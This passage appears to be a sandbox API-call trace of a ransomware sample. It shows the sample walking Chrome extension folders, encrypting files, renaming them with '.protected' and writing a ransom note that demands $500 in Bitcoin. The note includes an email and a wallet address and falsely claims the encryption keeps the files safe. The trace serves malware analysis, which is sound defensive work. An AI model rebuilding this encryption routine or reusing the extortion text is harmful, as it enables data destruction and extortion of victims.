(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.762] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.762] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.762] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.762] CloseHandle (hObject=0x164) returned 1 [0078.762] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0078.763] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned 141 [0078.763] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0078.763] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0078.763] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*") returned 143 [0078.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.763] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.763] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.763] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.763] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.764] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.764] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\.") returned 143 [0078.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.764] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.764] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.764] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.764] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.764] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.764] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.764] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\..") returned 144 [0078.764] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.764] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.764] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.764] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0078.764] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.764] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.764] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.764] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0078.764] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0078.764] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0078.764] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.765] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.765] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.765] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.765] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.765] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.766] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.766] CloseHandle (hObject=0x168) returned 1 [0078.766] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.protected") returned 165 [0078.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.protected")) returned 1 [0078.766] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.766] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.766] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0078.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.767] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.767] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.767] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.767] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.767] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.767] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.767] CloseHandle (hObject=0x164) returned 1 [0078.767] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.767] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0078.768] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0078.768] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0078.768] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0078.768] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0078.768] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned 141 [0078.768] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0078.768] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0078.768] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*") returned 143 [0078.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.768] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.768] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.768] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.768] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.768] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.768] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\.") returned 143 [0078.768] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.769] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.769] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.769] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.769] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.769] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.769] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\..") returned 144 [0078.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.769] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.769] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned 155 [0078.769] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.769] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.769] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.769] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned 155 [0078.769] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned 155 [0078.769] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned 155 [0078.770] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.770] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xcb, lpOverlapped=0x0) returned 1 [0078.770] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.770] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xcb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xcb, lpOverlapped=0x0) returned 1 [0078.770] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.770] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.771] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.771] CloseHandle (hObject=0x168) returned 1 [0078.771] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.protected") returned 165 [0078.771] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json.protected")) returned 1 [0078.771] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.771] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.771] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0078.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.772] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.772] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.772] lstrlenA 